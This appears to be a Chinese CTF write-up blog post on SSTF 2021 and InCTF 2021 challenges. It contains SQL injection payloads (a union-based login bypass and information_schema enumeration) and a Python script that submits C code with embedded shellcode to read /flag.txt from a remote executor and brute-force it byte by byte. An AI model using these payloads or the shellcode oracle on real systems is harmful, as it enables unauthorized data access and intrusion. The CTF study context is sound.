(C:)
WP
初学Socket笔记
最近没什么时间摸鱼了两场比赛
Samsung Security Tech Forum 2021
sqli101
Mission: login as an admin using SQL Injection
Hint - SQL query
select id from users where id='{$_GET["id"]}' and pw='{$_GET["pw"]}'要求和提示给的很明显,简单测试一下过滤了or
联合注入 payload:
?id=a&pw=a'/**/union/**/select/**/'admin
sqli102
一个根据关键词查询功能 ,给了hint
<?php
include "./config.php";
$succ = -1;
if($_GET['showsrc']) {
show_source("step1.php");
die;
}
if($_GET['searchkey']) {
$succ = 0;
$query = "select * from books where title like '%".$_GET['searchkey']."%'";
$db = dbconnect("sqli102_step3");
$result = mysqli_query($db,$query);
mysqli_close($db);
if($result) {
$rows = mysqli_num_rows($result);
}
}
?>
<!-- source: https://colorlib.com/wp/template/colorlib-search-23/ -->
<html>
<head>
<title>SQLi 102: Step 1</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="author" content="colorlib.com">
<style id="" media="all">/* devanagari */
@font-face {
font-family: 'Poppins';
font-style: normal;
font-weight: 400;
src: url(/fonts.gstatic.com/s/poppins/v15/pxiEyp8kv8JHgFVrJJbecmNE.woff2) format('woff2');
unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9, U+200C-200D, U+20A8, U+20B9, U+25CC, U+A830-A839, U+A8E0-A8FB;
}
</style>
<link href="style.css" rel="stylesheet" />
</head>
<body>
<div class="s130">
<form>
<table border="0">
<tr>
<td style="font-size: 28px; text-align: left"><strong>A book search service</strong></td>
<td style="text-align: right; vertical-align: bottom"><a href="?showsrc=True">[HINT]</a></td>
</tr>
</table>
<div class="inner-form">
<div class="input-field first-wrap">
<div class="svg-wrapper">
<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
<path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path>
</svg>
</div>
<input id="search" type="text" name="searchkey" placeholder="Enter keyword here" />
</div>
<div class="input-field second-wrap">
<button class="btn-search" type="submit">SEARCH</button>
</div>
</div>
<?
if ($rows > 0) {
?>
<br>
<h2>Search Result</h2>
<table>
<thead>
<tr>
<th width="10%">#</th>
<th width="50%">Title</th>
<th width="30%">Author</th>
<th width="10%">Price</th>
</tr>
</thead>
<tbody>
<?
for($idx = 1; $idx <= $rows; $idx++) {
$row = mysqli_fetch_assoc($result);
echo "<tr><th scope=\"row\">".$idx."</th>";
echo "<td>".$row["title"]."</td>";
echo "<td>".$row["author"]."</td>";
echo "<td>".$row["price"]."</td></tr>";
}
?>
</tbody>
</table>
<?
} else if ($succ === 0) {
?>
<br>
<h2>Sorry, no results for your request.</h2>
<?
} else {
?>
<br>
<h2 style="padding-left:30px">Quiz#1: How many columns are in the `<strong>count_me</strong>` table?</h2>
<?
}
?>
</form>
</div>
</body>
</html>主要看关键代码
$query = "select * from books where title like '%".$_GET['searchkey']."%'";sql的模糊匹配,先测试字段,为8时有回显
xxxxxxxxxxxxx%' union select * from books order by 8#
于是 联合注入,获取表名
xxxxxxxxxxxxx%' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7,8#
看到findme,获取列名,拿到flag
xxxxxxxxxxxxx%' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='findme'),3,4,5,6,7,8#
SW Expert Academy
Are you poor at algorithm coding? Here is amazing platform to enhance your coding skill!
题目要求
按要求搓了一个简陋的代码
#include<stdio.h>
int main(){
int Gcd(int m,int n)
{
if(n==0)
return m;
return Gcd(n,m%n);
}
int a[6],b[6];
int win=0,i=0,j=0;
for(i=0;i<6;i++)
{
scanf("%d",&a[i]);
}
for(i=0;i<6;i++)
{
scanf("%d",&b[i]);
}
for(i=0,j=0;i<6;j++)
{
if(a[i]>b[j])
{
win++;
}
if(j==6)
{
i++;
j=-1;
}
}
printf("%d/%d",win/Gcd(win,36),36/Gcd(win,36));
return 0;
}然后通过了三个测试案例,就会返回了三个True,然后由前端弹窗提示通过了几个测试点。
发现通过也没用,然后再F12里看到
<!-- Flag is placed at /flag.txt in executor instance. --><input type="hidden" name="sample_answer_code" value="aW50IGFbMTJdO2ZvcihpbnQgaT0wO2k8MTI7aSsrKXNjYW5mKCIlZCIsYStpKTtpbnQgYW5zPTA7aW50IG1vZD0zNjtmb3IoaW50IGk9MDtpPDY7aSsrKWZvcihpbnQgaj02O2o8MTI7aisrKWlmKGFbaV0+YVtqXSlhbnMrKztmb3IoaW50IGk9MjtpPDM2O2krKyl3aGlsZShhbnM+PWkmJmFucyVpPT0wJiZtb2QlaT09MClhbnMvPWksbW9kLz1pO3ByaW50ZigiJWQvJWQiLGFucyxtb2QpOw==">base64解密之后拿到代码
int a[12];for(int i=0;i<12;i++)scanf("%d",a+i);int ans=0;int mod=36;for(int i=0;i<6;i++)for(int j=6;j<12;j++)if(a[i]>a[j])ans++;for(int i=2;i<36;i++)while(ans>=i&&ans%i==0&&mod%i==0)ans/=i,mod/=i;printf("%d/%d",ans,mod);?????
知道了文件路径,尝试 fopen读文件 然后按位比较爆破,open被过滤了,利用system 反弹shell也被过滤了。但思路没问题了,读文件,比较,根据返回值判断。
我写了几行软弱无力的requests,然后Pandaos 大哥 写了shellcode来读取文件进行爆破。
import requests
import string
url='http://swexpertacademy.sstf.site/code'
def req(payload):
while True:
data = {'code': payload}
res = requests.post(url, data=data)
if res.text is None:
continue
return res.text
def test_one(pos, ch):
code = """int myfunc();
myfunc();
return 0;
}
__attribute__((section(".text")))
const unsigned char code[] = {
0x55,0x48,0x89,0xe5,0x48,0x83,0xec,0x50,0x6a,0x74,0x48,0xb8,0x2f,0x66,0x6c,0x61,0x67,0x2e,0x74,0x78,0x50,0x48,0x89,0x7c,0x24,0x20,0x48,0x89,0xe7,0x31,0xd2,0x31,0xf6,0x6a,0x2,0x58,0xf,0x5,0x48,0x89,0xc7,0x31,0xc0,0x6a,0x40,0x5a,0x48,0x8b,0x74,0x24,0x20,0xf,0x5,0x48,0x89,0xec,0x5d,0xc3
};
int myfunc() {
char buffer[100];
int pos = %d;
(*(void(*)(char *)) code)(buffer);
if(buffer[pos] == '%s') {
int a[12];for(int i=0;i<12;i++)scanf("%%d",a+i);int ans=0;int mod=36;for(int i=0;i<6;i++)for(int j=6;j<12;j++)if(a[i]>a[j])ans++;for(int i=2;i<36;i++)while(ans>=i&&ans%%i==0&&mod%%i==0)ans/=i,mod/=i;printf("%%d/%%d",ans,mod);
}
""" % (pos, ch)
return req(code)
flag = ''
for i in range(60):
for ch in string.printable:
if 'true' in test_one(i, ch):
flag += ch
print(flag)
break
本地挂代理都跑得慢,丢服务器上
Inctf 2021
Listen
一道network,给了一个ovpn文件,然后打开openvpn连接可以看到,连接到了 34.87.108.160 并且不断接收到数据
但是抓包一直没有抓到flag
解法是操作原生的 socket
由于菜,还没学socket,脚本是队友写的。自己添加了一些判断,然后顺便学习了一点点socket相关的知识,脚本如下
import socket
import re
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
start = 'inctf'
end = '}'
def listen():
skt.bind(('172.30.0.14',31337))
skt.listen(1)
handle,addr=skt.accept()
for i in range(4):
text = handle.recv(2048).decode()
flag = re.findall(start+"(.+)"+end,text)
if flag:
print(start+flag[0]+end)
listen()